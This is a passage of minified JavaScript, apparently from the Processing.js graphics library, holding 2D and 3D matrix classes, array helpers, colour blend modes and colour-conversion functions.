aT){d9=arguments[0].array()}else{if(arguments.length===6){d9=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof Array){d9=arguments[0]}}}var d7=[0,0,this.elements[2],0,0,this.elements[5]];var ea=0;for(var eb=0;eb<2;eb++){for(var d8=0;d8<3;d8++,ea++){d7[ea]+=this.elements[eb*3+0]*d9[d8+0]+this.elements[eb*3+1]*d9[d8+3]}}this.elements=d7.slice()},preApply:function(){var d8;if(arguments.length===1&&arguments[0] instanceof aT){d8=arguments[0].array()}else{if(arguments.length===6){d8=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof Array){d8=arguments[0]}}}var d7=[0,0,d8[2],0,0,d8[5]];d7[2]=d8[2]+this.elements[2]*d8[0]+this.elements[5]*d8[1];d7[5]=d8[5]+this.elements[2]*d8[3]+this.elements[5]*d8[4];d7[0]=this.elements[0]*d8[0]+this.elements[3]*d8[1];d7[3]=this.elements[0]*d8[3]+this.elements[3]*d8[4];d7[1]=this.elements[1]*d8[0]+this.elements[4]*d8[1];d7[4]=this.elements[1]*d8[3]+this.elements[4]*d8[4];this.elements=d7.slice()},rotate:function(d9){var eb=o.cos(d9);var d7=o.sin(d9);var ea=this.elements[0];var d8=this.elements[1];this.elements[0]=eb*ea+d7*d8;this.elements[1]=-d7*ea+eb*d8;ea=this.elements[3];d8=this.elements[4];this.elements[3]=eb*ea+d7*d8;this.elements[4]=-d7*ea+eb*d8},rotateZ:function(d7){this.rotate(d7)},invRotateZ:function(d7){this.rotateZ(d7-o.PI)},print:function(){var d8=cl(this.elements);var d7=""+cV.nfs(this.elements[0],d8,4)+" "+cV.nfs(this.elements[1],d8,4)+" "+cV.nfs(this.elements[2],d8,4)+"\n"+cV.nfs(this.elements[3],d8,4)+" "+cV.nfs(this.elements[4],d8,4)+" "+cV.nfs(this.elements[5],d8,4)+"\n\n";cV.println(d7)}};var aM=cV.PMatrix3D=function(){this.reset()};aM.prototype={set:function(){if(arguments.length===16){this.elements=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof aM){this.elements=arguments[0].array()}else{if(arguments.length===1&&arguments[0] instanceof Array){this.elements=arguments[0].slice()}}}},get:function(){var d7=new aM;d7.set(this.elements);return d7},reset:function(){this.elements=[1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1]},array:function aD(){return this.elements.slice()},translate:function(d8,d7,d9){if(d9===r){d9=0}this.elements[3]+=d8*this.elements[0]+d7*this.elements[1]+d9*this.elements[2];this.elements[7]+=d8*this.elements[4]+d7*this.elements[5]+d9*this.elements[6];this.elements[11]+=d8*this.elements[8]+d7*this.elements[9]+d9*this.elements[10];this.elements[15]+=d8*this.elements[12]+d7*this.elements[13]+d9*this.elements[14]},transpose:function(){var d7=this.elements[4];this.elements[4]=this.elements[1];this.elements[1]=d7;d7=this.elements[8];this.elements[8]=this.elements[2];this.elements[2]=d7;d7=this.elements[6];this.elements[6]=this.elements[9];this.elements[9]=d7;d7=this.elements[3];this.elements[3]=this.elements[12];this.elements[12]=d7;d7=this.elements[7];this.elements[7]=this.elements[13];this.elements[13]=d7;d7=this.elements[11];this.elements[11]=this.elements[14];this.elements[14]=d7},mult:function(d9,ea){var d7,ec,eb,d8;if(d9 instanceof y){d7=d9.x;ec=d9.y;eb=d9.z;d8=1;if(!ea){ea=new y}}else{if(d9 instanceof Array){d7=d9[0];ec=d9[1];eb=d9[2];d8=d9[3]||1;if(!ea||ea.length!==3&&ea.length!==4){ea=[0,0,0]}}}if(ea instanceof Array){if(ea.length===3){ea[0]=this.elements[0]*d7+this.elements[1]*ec+this.elements[2]*eb+this.elements[3];ea[1]=this.elements[4]*d7+this.elements[5]*ec+this.elements[6]*eb+this.elements[7];ea[2]=this.elements[8]*d7+this.elements[9]*ec+this.elements[10]*eb+this.elements[11]}else{if(ea.length===4){ea[0]=this.elements[0]*d7+this.elements[1]*ec+this.elements[2]*eb+this.elements[3]*d8;ea[1]=this.elements[4]*d7+this.elements[5]*ec+this.elements[6]*eb+this.elements[7]*d8;ea[2]=this.elements[8]*d7+this.elements[9]*ec+this.elements[10]*eb+this.elements[11]*d8;ea[3]=this.elements[12]*d7+this.elements[13]*ec+this.elements[14]*eb+this.elements[15]*d8}}}if(ea instanceof y){ea.x=this.elements[0]*d7+this.elements[1]*ec+this.elements[2]*eb+this.elements[3];ea.y=this.elements[4]*d7+this.elements[5]*ec+this.elements[6]*eb+this.elements[7];ea.z=this.elements[8]*d7+this.elements[9]*ec+this.elements[10]*eb+this.elements[11]}return ea},preApply:function(){var d9;if(arguments.length===1&&arguments[0] instanceof aM){d9=arguments[0].array()}else{if(arguments.length===16){d9=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof Array){d9=arguments[0]}}}var d7=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];var ea=0;for(var eb=0;eb<4;eb++){for(var d8=0;d8<4;d8++,ea++){d7[ea]+=this.elements[d8+0]*d9[eb*4+0]+this.elements[d8+4]*d9[eb*4+1]+this.elements[d8+8]*d9[eb*4+2]+this.elements[d8+12]*d9[eb*4+3]}}this.elements=d7.slice()},apply:function(){var d9;if(arguments.length===1&&arguments[0] instanceof aM){d9=arguments[0].array()}else{if(arguments.length===16){d9=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof Array){d9=arguments[0]}}}var d7=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];var ea=0;for(var eb=0;eb<4;eb++){for(var d8=0;d8<4;d8++,ea++){d7[ea]+=this.elements[eb*4+0]*d9[d8+0]+this.elements[eb*4+1]*d9[d8+4]+this.elements[eb*4+2]*d9[d8+8]+this.elements[eb*4+3]*d9[d8+12]}}this.elements=d7.slice()},rotate:function(eb,d7,ed,ea){if(!ed){this.rotateZ(eb)}else{var ec=cV.cos(eb);var d9=cV.sin(eb);var d8=1-ec;this.apply(d8*d7*d7+ec,d8*d7*ed-d9*ea,d8*d7*ea+d9*ed,0,d8*d7*ed+d9*ea,d8*ed*ed+ec,d8*ed*ea-d9*d7,0,d8*d7*ea-d9*ed,d8*ed*ea+d9*d7,d8*ea*ea+ec,0,0,0,0,1)}},invApply:function(){if(Z===r){Z=new aM}var d7=arguments;Z.set(d7[0],d7[1],d7[2],d7[3],d7[4],d7[5],d7[6],d7[7],d7[8],d7[9],d7[10],d7[11],d7[12],d7[13],d7[14],d7[15]);if(!Z.invert()){return false}this.preApply(Z);return true},rotateX:function(d8){var d9=cV.cos(d8);var d7=cV.sin(d8);this.apply([1,0,0,0,0,d9,-d7,0,0,d7,d9,0,0,0,0,1])},rotateY:function(d8){var d9=cV.cos(d8);var d7=cV.sin(d8);this.apply([d9,0,d7,0,0,1,0,0,-d7,0,d9,0,0,0,0,1])},rotateZ:function(d8){var d9=o.cos(d8);var d7=o.sin(d8);this.apply([d9,-d7,0,0,d7,d9,0,0,0,0,1,0,0,0,0,1])},scale:function(d9,d8,d7){if(d9&&!d8&&!d7){d8=d7=d9}else{if(d9&&d8&&!d7){d7=1}}if(d9&&d8&&d7){this.elements[0]*=d9;this.elements[1]*=d8;this.elements[2]*=d7;this.elements[4]*=d9;this.elements[5]*=d8;this.elements[6]*=d7;this.elements[8]*=d9;this.elements[9]*=d8;this.elements[10]*=d7;this.elements[12]*=d9;this.elements[13]*=d8;this.elements[14]*=d7}},skewX:function(d8){var d7=o.tan(d8);this.apply(1,d7,0,0,0,1,0,0,0,0,1,0,0,0,0,1)},skewY:function(d8){var d7=o.tan(d8);this.apply(1,0,0,0,d7,1,0,0,0,0,1,0,0,0,0,1)},multX:function(d7,ea,d9,d8){if(!d9){return this.elements[0]*d7+this.elements[1]*ea+this.elements[3]}if(!d8){return this.elements[0]*d7+this.elements[1]*ea+this.elements[2]*d9+this.elements[3]}return this.elements[0]*d7+this.elements[1]*ea+this.elements[2]*d9+this.elements[3]*d8},multY:function(d7,ea,d9,d8){if(!d9){return this.elements[4]*d7+this.elements[5]*ea+this.elements[7]}if(!d8){return this.elements[4]*d7+this.elements[5]*ea+this.elements[6]*d9+this.elements[7]}return this.elements[4]*d7+this.elements[5]*ea+this.elements[6]*d9+this.elements[7]*d8},multZ:function(d7,ea,d9,d8){if(!d8){return this.elements[8]*d7+this.elements[9]*ea+this.elements[10]*d9+this.elements[11]}return this.elements[8]*d7+this.elements[9]*ea+this.elements[10]*d9+this.elements[11]*d8},multW:function(d7,ea,d9,d8){if(!d8){return this.elements[12]*d7+this.elements[13]*ea+this.elements[14]*d9+this.elements[15]}return this.elements[12]*d7+this.elements[13]*ea+this.elements[14]*d9+this.elements[15]*d8},invert:function(){var eg=this.elements[0]*this.elements[5]-this.elements[1]*this.elements[4];var ef=this.elements[0]*this.elements[6]-this.elements[2]*this.elements[4];var ee=this.elements[0]*this.elements[7]-this.elements[3]*this.elements[4];var ed=this.elements[1]*this.elements[6]-this.elements[2]*this.elements[5];var ec=this.elements[1]*this.elements[7]-this.elements[3]*this.elements[5];var eb=this.elements[2]*this.elements[7]-this.elements[3]*this.elements[6];var ea=this.elements[8]*this.elements[13]-this.elements[9]*this.elements[12];var d9=this.elements[8]*this.elements[14]-this.elements[10]*this.elements[12];var d8=this.elements[8]*this.elements[15]-this.elements[11]*this.elements[12];var el=this.elements[9]*this.elements[14]-this.elements[10]*this.elements[13];var ej=this.elements[9]*this.elements[15]-this.elements[11]*this.elements[13];var ei=this.elements[10]*this.elements[15]-this.elements[11]*this.elements[14];var ek=eg*ei-ef*ej+ee*el+ed*d8-ec*d9+eb*ea;if(o.abs(ek)<=1e-9){return false}var eh=[];eh[0]=+this.elements[5]*ei-this.elements[6]*ej+this.elements[7]*el;eh[4]=-this.elements[4]*ei+this.elements[6]*d8-this.elements[7]*d9;eh[8]=+this.elements[4]*ej-this.elements[5]*d8+this.elements[7]*ea;eh[12]=-this.elements[4]*el+this.elements[5]*d9-this.elements[6]*ea;eh[1]=-this.elements[1]*ei+this.elements[2]*ej-this.elements[3]*el;eh[5]=+this.elements[0]*ei-this.elements[2]*d8+this.elements[3]*d9;eh[9]=-this.elements[0]*ej+this.elements[1]*d8-this.elements[3]*ea;eh[13]=+this.elements[0]*el-this.elements[1]*d9+this.elements[2]*ea;eh[2]=+this.elements[13]*eb-this.elements[14]*ec+this.elements[15]*ed;eh[6]=-this.elements[12]*eb+this.elements[14]*ee-this.elements[15]*ef;eh[10]=+this.elements[12]*ec-this.elements[13]*ee+this.elements[15]*eg;eh[14]=-this.elements[12]*ed+this.elements[13]*ef-this.elements[14]*eg;eh[3]=-this.elements[9]*eb+this.elements[10]*ec-this.elements[11]*ed;eh[7]=+this.elements[8]*eb-this.elements[10]*ee+this.elements[11]*ef;eh[11]=-this.elements[8]*ec+this.elements[9]*ee-this.elements[11]*eg;eh[15]=+this.elements[8]*ed-this.elements[9]*ef+this.elements[10]*eg;var d7=1/ek;eh[0]*=d7;eh[1]*=d7;eh[2]*=d7;eh[3]*=d7;eh[4]*=d7;eh[5]*=d7;eh[6]*=d7;eh[7]*=d7;eh[8]*=d7;eh[9]*=d7;eh[10]*=d7;eh[11]*=d7;eh[12]*=d7;eh[13]*=d7;eh[14]*=d7;eh[15]*=d7;this.elements=eh.slice();return true},toString:function(){var d8="";for(var d7=0;d7<15;d7++){d8+=this.elements[d7]+", "}d8+=this.elements[15];return d8},print:function(){var d8=cl(this.elements);var d7=""+cV.nfs(this.elements[0],d8,4)+" "+cV.nfs(this.elements[1],d8,4)+" "+cV.nfs(this.elements[2],d8,4)+" "+cV.nfs(this.elements[3],d8,4)+"\n"+cV.nfs(this.elements[4],d8,4)+" "+cV.nfs(this.elements[5],d8,4)+" "+cV.nfs(this.elements[6],d8,4)+" "+cV.nfs(this.elements[7],d8,4)+"\n"+cV.nfs(this.elements[8],d8,4)+" "+cV.nfs(this.elements[9],d8,4)+" "+cV.nfs(this.elements[10],d8,4)+" "+cV.nfs(this.elements[11],d8,4)+"\n"+cV.nfs(this.elements[12],d8,4)+" "+cV.nfs(this.elements[13],d8,4)+" "+cV.nfs(this.elements[14],d8,4)+" "+cV.nfs(this.elements[15],d8,4)+"\n\n";cV.println(d7)},invTranslate:function(d8,d7,d9){this.preApply(1,0,0,-d8,0,1,0,-d7,0,0,1,-d9,0,0,0,1)},invRotateX:function(d8){var d9=o.cos(-d8);var d7=o.sin(-d8);this.preApply([1,0,0,0,0,d9,-d7,0,0,d7,d9,0,0,0,0,1])},invRotateY:function(d8){var d9=o.cos(-d8);var d7=o.sin(-d8);this.preApply([d9,0,d7,0,0,1,0,0,-d7,0,d9,0,0,0,0,1])},invRotateZ:function(d8){var d9=o.cos(-d8);var d7=o.sin(-d8);this.preApply([d9,-d7,0,0,d7,d9,0,0,0,0,1,0,0,0,0,1])},invScale:function(d7,d9,d8){this.preApply([1/d7,0,0,0,0,1/d9,0,0,0,0,1/d8,0,0,0,0,1])}};var T=cV.PMatrixStack=function(){this.matrixStack=[]};T.prototype.load=function(){var d7=dU.$newPMatrix();if(arguments.length===1){d7.set(arguments[0])}else{d7.set(arguments)}this.matrixStack.push(d7)};bO.prototype.$newPMatrix=function(){return new aT};by.prototype.$newPMatrix=function(){return new aM};T.prototype.push=function(){this.matrixStack.push(this.peek())};T.prototype.pop=function(){return this.matrixStack.pop()};T.prototype.peek=function(){var d7=dU.$newPMatrix();d7.set(this.matrixStack[this.matrixStack.length-1]);return d7};T.prototype.mult=function(d7){this.matrixStack[this.matrixStack.length-1].apply(d7)};cV.split=function(d8,d7){return d8.split(d7)};cV.splitTokens=function(ea,d9){if(arguments.length===1){d9="\n\t\r\u000c "}d9="["+d9+"]";var d8=[];var d7=0;var eb=ea.search(d9);while(eb>=0){if(eb===0){ea=ea.substring(1)}else{d8[d7]=ea.substring(0,eb);d7++;ea=ea.substring(eb)}eb=ea.search(d9)}if(ea.length>0){d8[d7]=ea}if(d8.length===0){d8=r}return d8};cV.append=function(d8,d7){d8[d8.length]=d7;return d8};cV.concat=function(d8,d7){return d8.concat(d7)};cV.sort=function(ec,ea){var d8=[];if(ec.length>0){var eb=ea>0?ea:ec.length;for(var d9=0;d9<eb;d9++){d8.push(ec[d9])}if(typeof ec[0]==="string"){d8.sort()}else{d8.sort(function(ee,ed){return ee-ed})}if(ea>0){for(var d7=d8.length;d7<ec.length;d7++){d8.push(ec[d7])}}}return d8};cV.splice=function(eb,ea,d8){if(ea.length===0){return eb}if(ea instanceof Array){for(var d9=0,d7=d8;d9<ea.length;d7++,d9++){eb.splice(d7,0,ea[d9])}}else{eb.splice(d8,0,ea)}return eb};cV.subset=function(ea,d9,d8){var d7=d8!==r?d9+d8:ea.length;return ea.slice(d9,d7)};cV.join=function(d8,d7){return d8.join(d7)};cV.shorten=function(ea){var d8=[];var d7=ea.length;for(var d9=0;d9<d7;d9++){d8[d9]=ea[d9]}d8.pop();return d8};cV.expand=function(d9,ea){var d8=d9.slice(0),d7=ea||d9.length*2;d8.length=d7;return d8};cV.arrayCopy=function(){var ed,eb=0,d9,d8=0,ec;if(arguments.length===2){ed=arguments[0];d9=arguments[1];ec=ed.length}else{if(arguments.length===3){ed=arguments[0];d9=arguments[1];ec=arguments[2]}else{if(arguments.length===5){ed=arguments[0];eb=arguments[1];d9=arguments[2];d8=arguments[3];ec=arguments[4]}}}for(var ea=eb,d7=d8;ea<ec+eb;ea++,d7++){if(d9[d7]!==r){d9[d7]=ed[ea]}else{throw"array index out of bounds exception"}}};cV.reverse=function(d7){return d7.reverse()};cV.mix=function(d8,d7,d9){return d8+((d7-d8)*d9>>8)};cV.peg=function(d7){return d7<0?0:d7>255?255:d7};cV.modes=function(){var ec=4278190080,d9=16711680,d8=65280,eb=255,ea=o.min,d7=o.max;function ed(ei,el,eh,eq,es,er,ej,en,em,ef,eg){var ep=ea(((ei&4278190080)>>>24)+el,255)<<24;var ee=eh+((em-eh)*el>>8);ee=(ee<0?0:ee>255?255:ee)<<16;var ek=eq+((ef-eq)*el>>8);ek=(ek<0?0:ek>255?255:ek)<<8;var eo=es+((eg-es)*el>>8);eo=eo<0?0:eo>255?255:eo;return ep|ee|ek|eo}return{replace:function(ef,ee){return ee},blend:function(eg,ef){var ei=(ef&ec)>>>24,ee=eg&d9,ek=eg&d8,em=eg&eb,el=ef&d9,eh=ef&d8,ej=ef&eb;return ea(((eg&ec)>>>24)+ei,255)<<24|ee+((el-ee)*ei>>8)&d9|ek+((eh-ek)*ei>>8)&d8|em+((ej-em)*ei>>8)&eb},add:function(ef,ee){var eg=(ee&ec)>>>24;return ea(((ef&ec)>>>24)+eg,255)<<24|ea((ef&d9)+((ee&d9)>>8)*eg,d9)&d9|ea((ef&d8)+((ee&d8)>>8)*eg,d8)&d8|ea((ef&eb)+((ee&eb)*eg>>8),eb)},subtract:function(ef,ee){var eg=(ee&ec)>>>24;return ea(((ef&ec)>>>24)+eg,255)<<24|d7((ef&d9)-((ee&d9)>>8)*eg,d8)&d9|d7((ef&d8)-((ee&d8)>>8)*eg,eb)&d8|d7((ef&eb)-((ee&eb)*eg>>8),0)},lightest:function(ef,ee){var eg=(ee&ec)>>>24;return ea(((ef&ec)>>>24)+eg,255)<<24|d7(ef&d9,((ee&d9)>>8)*eg)&d9|d7(ef&d8,((ee&d8)>>8)*eg)&d8|d7(ef&eb,(ee&eb)*eg>>8)},darkest:function(eg,ef){var ei=(ef&ec)>>>24,ee=eg&d9,ek=eg&d8,em=eg&eb,el=ea(eg&d9,((ef&d9)>>8)*ei),eh=ea(eg&d8,((ef&d8)>>8)*ei),ej=ea(eg&eb,(ef&eb)*ei>>8);return ea(((eg&ec)>>>24)+ei,255)<<24|ee+((el-ee)*ei>>8)&d9|ek+((eh-ek)*ei>>8)&d8|em+((ej-em)*ei>>8)&eb},difference:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eg>eo?eg-eo:eo-eg,ee=en>ej?en-ej:ej-en,ef=ep>em?ep-em:em-ep;return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},exclusion:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eg+eo-(eg*eo>>7),ee=en+ej-(en*ej>>7),ef=ep+em-(ep*em>>7);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},multiply:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eg*eo>>8,ee=en*ej>>8,ef=ep*em>>8;return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},screen:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=255-((255-eg)*(255-eo)>>8),ee=255-((255-en)*(255-ej)>>8),ef=255-((255-ep)*(255-em)>>8);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},hard_light:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eo<128?eg*eo>>7:255-((255-eg)*(255-eo)>>7),ee=ej<128?en*ej>>7:255-((255-en)*(255-ej)>>7),ef=em<128?ep*em>>7:255-((255-ep)*(255-em)>>7);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},soft_light:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=(eg*eo>>7)+(eg*eg>>8)-(eg*eg*eo>>15),ee=(en*ej>>7)+(en*en>>8)-(en*en*ej>>15),ef=(ep*em>>7)+(ep*ep>>8)-(ep*ep*em>>15);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},overlay:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eg<128?eg*eo>>7:255-((255-eg)*(255-eo)>>7),ee=en<128?en*ej>>7:255-((255-en)*(255-ej)>>7),ef=ep<128?ep*em>>7:255-((255-ep)*(255-em)>>7);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},dodge:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb;var el=255;if(eo!==255){el=(eg<<8)/(255-eo);el=el<0?0:el>255?255:el}var ee=255;if(ej!==255){ee=(en<<8)/(255-ej);ee=ee<0?0:ee>255?255:ee}var ef=255;if(em!==255){ef=(ep<<8)/(255-em);ef=ef<0?0:ef>255?255:ef}return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},burn:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb;var el=0;if(eo!==0){el=(255-eg<<8)/eo;el=255-(el<0?0:el>255?255:el)}var ee=0;if(ej!==0){ee=(255-en<<8)/ej;ee=255-(ee<0?0:ee>255?255:ee)}var ef=0;if(em!==0){ef=(255-ep<<8)/em;ef=255-(ef<0?0:ef>255?255:ef)}return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)}}}();function dD(ec,eb,d9,d8){var d7,ea,ee,ef;if(cX===3){var ed=cV.color.toRGB(ec,eb,d9);d7=ed[0];ea=ed[1];ee=ed[2]}else{d7=o.round(255*(ec/bG));ea=o.round(255*(eb/bF));ee=o.round(255*(d9/bD))}ef=o.round(255*(d8/bR));d7=d7<0?0:d7;ea=ea<0?0:ea;ee=ee<0?0:ee;ef=ef<0?0:ef;d7=d7>255?255:d7;ea=ea>255?255:ea;ee=ee>255?255:ee;ef=ef>255?255:ef;return ef<<24&4278190080|d7<<16&16711680|ea<<8&65280|ee&255}function dG(d7,d9){var d8;if(d7&4278190080){d8=o.round(255*(d9/bR));d8=d8>255?255:d8;d8=d8<0?0:d8;return d7-(d7&4278190080)+(d8<<24&4278190080)}if(cX===1){return dD(d7,d7,d7,d9)}if(cX===3){return dD(0,0,d7/bG*bD,d9)}}function dI(d7){if(d7<=bG&&d7>=0){if(cX===1){return dD(d7,d7,d7,bR)}if(cX===3){return dD(0,0,d7/bG*bD,bR)}}if(d7){if(d7>2147483647){d7-=4294967296}return d7}}cV.color=function(d7,ea,d9,d8){if(d7!==r&&ea!==r&&d9!==r&&d8!==r){return dD(d7,ea,d9,d8)}if(d7!==r&&ea!==r&&d9!==r){return dD(d7,ea,d9,bR)}if(d7!==r&&ea!==r){return dG(d7,ea)}if(typeof d7==="number"){return dI(d7)}return dD(bG,bF,bD,bR)};cV.color.toString=function(d7){return"rgba("+((d7>>16)&255)+","+((d7>>8)&255)+","+(d7&255)+","+((d7>>24)&255)/255+")"};cV.color.toInt=function(ea,d9,d7,d8){return d8<<24&4278190080|ea<<16&16711680|d9<<8&65280|d7&255};cV.color.toArray=function(d7){return[(d7>>16)&255,(d7>>8)&255,d7&255,(d7>>24)&255]};cV.color.toGLArray=function(d7){return[((d7>>16)&255)/255,((d7>>8)&255)/255,(d7&255)/255,((d7&4278190080)>>>24)/255]};cV.color.toRGB=function(d9,ef,ec){d9=d9>bG?bG:d9;ef=ef>bF?bF:ef;ec=ec>bD?bD:ec;d9=d9/bG*360;ef=ef/bF*100;ec=ec/bD*100;var ee=o.round(ec/100*255);if(ef===0){return[ee,ee,ee]}var ea=d9%360;var eb=ea%60;var d8=o.round(ec*(100-ef)/10000*255);var d7=o.round(ec*(6000-ef*eb)/600000*255);var ed=o.round(ec*(6000-ef*(60-eb))/600000*255);switch(o.floor(ea/60)){case 0:return[ee,ed,d8];case 1:return[d7,ee,d8];case 2:return[d8,ee,ed];case 3:return[d8,d7,ee];case 4:return[ed,d8,ee];case 5:return[ee,d8,d7]}};function aP(ee){var ed,ec,d8;ed=((ee>>16)&255)/255;ec=((ee>>8)&255)/255;d8=(ee&255)/255;var d7=cV.max(cV.max(ed,ec),d8),ea=cV.min(cV.min(ed,ec),d8),d9,eb;if(ea===d7){return[0,0,d7*bD]}eb=(d7-ea)/d7;if(ed===d7){d9=(ec-d8)/(d7-ea)}else{if(ec===d7){d9=2+(d8-ed)/(d7-ea)}else{d9=4+(ed-ec)/(d7-ea)}}d9/=6;if(d9<0){d9+=1}else{if(d9>1){d9-=1}}return[d9*bG,eb*bF,d7*bD]}cV.brightness=function(d7){return aP(d7)[2]};cV.saturation=function(d7){return aP(d7)[1]};cV.hue=function(d7){return aP(d7)[0]};cV.red=function(d7){return((d7>>16)&255)/255*bG};cV.green=function(d7){return((d7>>8)&255)/255*bF};cV.blue=function(d7){return(d7&255)/255*bD};cV.alpha=function(d7){return((d7>>24)&255)/255*bR};cV.lerpColor=function(ej,ei,ec){var eh,en,eo,ep,el,d7,ed,er,ek,es,eb,eq;var ef,ee,d8,em,eg;var ea=cV.color(ej);var d9=cV.color(ei);if(cX===3){ef=aP(ea);er=((ea>>24)&255)/bR;ee=aP(d9);eq=((d9>>24)&255)/bR;em=cV.lerp(ef[0],ee[0],ec);eg=cV.lerp(ef[1],ee[1],ec);eo=cV.lerp(ef[2],ee[2],ec);d8=cV.color.toRGB(em,eg,eo);ep=cV.lerp(er,eq,ec)*bR;return ep<<24&4278190080|(d8[0]&255)<<16|(d8[1]&255)<<8|d8[2]&255}el=(ea>>16)&255;d7=(ea>>8)&255;ed=ea&255;er=((ea>>24)&255)/bR;ek=(d9>>16)&255;es=(d9>>8)&255;eb=d9&255;eq=((d9&4278190080)>>>24)/bR;eh=cV.lerp(el,ek,ec)|0;en=cV.lerp(d7,es,ec)|0;eo=cV.lerp(ed,eb,ec)|0;ep=cV.lerp(er,eq,ec)*bR;return ep<<24&4278190080|eh<<16&16711680|en<<8&65280|eo&255};cV.colorMode=function(){cX=arguments[0];if(arguments.length>1){bG=arguments[1];bF=arguments[2]||arguments[1];bD=arguments[3]||arguments[1];bR=arguments[4]||arguments[1]}};cV.blendColor=function(d8,d7,d9){if(d9===0){return cV.modes.replace(d8,d7)}else{if(d9===1){return cV.modes.blend(d8,d7)}else{if(d9===2){return cV.modes.add(d8,d7)}else{if(d9===4){return cV.modes.subtract(d8,d7)}else{if(d9===8){return cV.modes.lightest(d8,d7)}else{if(d9===16){return cV.modes.darkest(d8,d7)}else{if(d9===32){return cV.modes.difference(d8,d7)}else{if(d9===64){return cV.modes.exclusion(d8,d7)}else{if(d9===128){return cV.modes.multiply(d8,d7)}else{if(d9===256){return cV.modes.screen(d8,d7)}else{if(d9===1024){return cV.modes.hard_light(d8,d7)}else{if(d9===2048){return cV.modes.soft_light(d8,d7)}else{if(d9===512){return cV.modes.overlay(d8,d7)}else{if(d9===4096){return cV.modes.dodge(d8,d7)}else{if(d9===8192){return cV.modes.burn(d8,d7)}}}}}}}}}}}}}}}};function aC(){d4.save()}function cO(){d4.restore();b2=true;ap=true}cV.printMatrix=function(){dF.print()};bO.prototype.translate=function(d7,d8){dF.translate(d7,d8);aQ.invTranslate(d7,d8);d4.translate(d7,d8)};by.prototype.translate=function(d7,d9,d8){dF.translate(d7,d9,d8);aQ.invTranslate(d7,d9,d8)};bO.prototype.scale=function(d7,d8){dF.scale(d7,d8);aQ.invScale(d7,d8);d4.scale(d7,d8||d7)};by.prototype.scale=function(d7,d9,d8){dF.scale(d7,d9,d8);aQ.invScale(d7,d9,d8)};bO.prototype.pushMatrix=function(){al.load(dF);c9.load(aQ);aC()};by.prototype.pushMatrix=function(){al.load(dF);c9.load(aQ)};bO.prototype.popMatrix=function(){dF.set(al.pop());aQ.set(c9.pop());cO()};by.prototype.popMatrix=function(){dF.set(al.pop());aQ.set(c9.pop())};bO.prototype.resetMatrix=function(){dF.reset();aQ.reset();d4.setTransform(1,0,0,1,0,0)};by.prototype.resetMatrix=function(){dF.reset();aQ.reset()};dp.prototype.applyMatrix=function(){var d7=arguments;dF.apply(d7[0],d7[1],d7[2],d7[3],d7[4],d7[5],d7[6],d7[7],d7[8],d7[9],d7[10],d7[11],d7[12],d7[13],d7[14],d7[15]);aQ.invApply(d7[0],d7[1],d7[2],d7[3],d7[4],d7[5],d7[6],d7[7],d7[8],d7[9],d7[10],d7[11],d7[12],d7[13],d7[14],d7[15])};bO.prototype.applyMatrix=function(){var d7=arguments;for(var d8=d7.length;d8<16;d8++){d7[d8]=0}d7[10]=d7[15]=1;dp.prototype.applyMatrix.apply(this,d7)};cV.rotateX=function(d7){dF.rotateX(d7);aQ.invRotateX(d7)};bO.prototype.rotateZ=function(){throw"rotateZ() is not supported in 2D mode. Use rotate(float) instead."};by.prototype.rotateZ=function(d7){dF.rotateZ(d7);aQ.invRotateZ(d7)};cV.rotateY=function(d7){dF.rotateY(d7);aQ.invRotateY(d7)};bO.prototype.rotate=function(d7){dF.rotateZ(d7);aQ.invRotateZ(d7);d4.rotate(d7)};by.prototype.rotate=function(d7){cV.rotateZ(d7)};cV.pushStyle=function(){aC();cV.pushMatrix();var 